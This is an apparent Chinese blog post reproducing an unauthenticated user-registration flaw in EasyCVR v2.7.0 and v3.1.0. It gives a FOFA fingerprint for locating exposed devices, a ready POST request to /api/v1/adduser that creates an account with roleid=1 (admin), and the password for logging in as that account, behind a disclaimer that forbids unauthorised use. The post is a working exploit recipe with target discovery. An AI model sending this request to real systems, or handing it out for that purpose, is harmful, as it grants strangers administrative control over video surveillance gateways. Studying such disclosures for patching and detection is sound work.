漏洞复现--EasyCVR任意用户注册

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行

一、漏洞描述

EasyCVR智能边缘网关未授权添加任意用户,通过非法请求添加新用户,roleid=1默认为admin角色权限

二、影响版本

EasyCVR v2.7.0,EasyCVR v3.1.0

三、漏洞复现

FOFA绘测: icon_hash="458134656"

  1. 开启bp抓包,刷新漏洞存在页

image.png
image.png

  1. payload,根据实际情况进行修改

POST /api/v1/adduser HTTP/1.1
Host: xxxxxx:18000
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=123456&username=123456&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
image.png

  1. 发送请求

image.png

  1. 登陆

密码:Admin@123
image.png

  1. 复现成功

image.png

posted @ 2024-01-17 15:32  Lauriey  阅读(371)  评论(0)    收藏  举报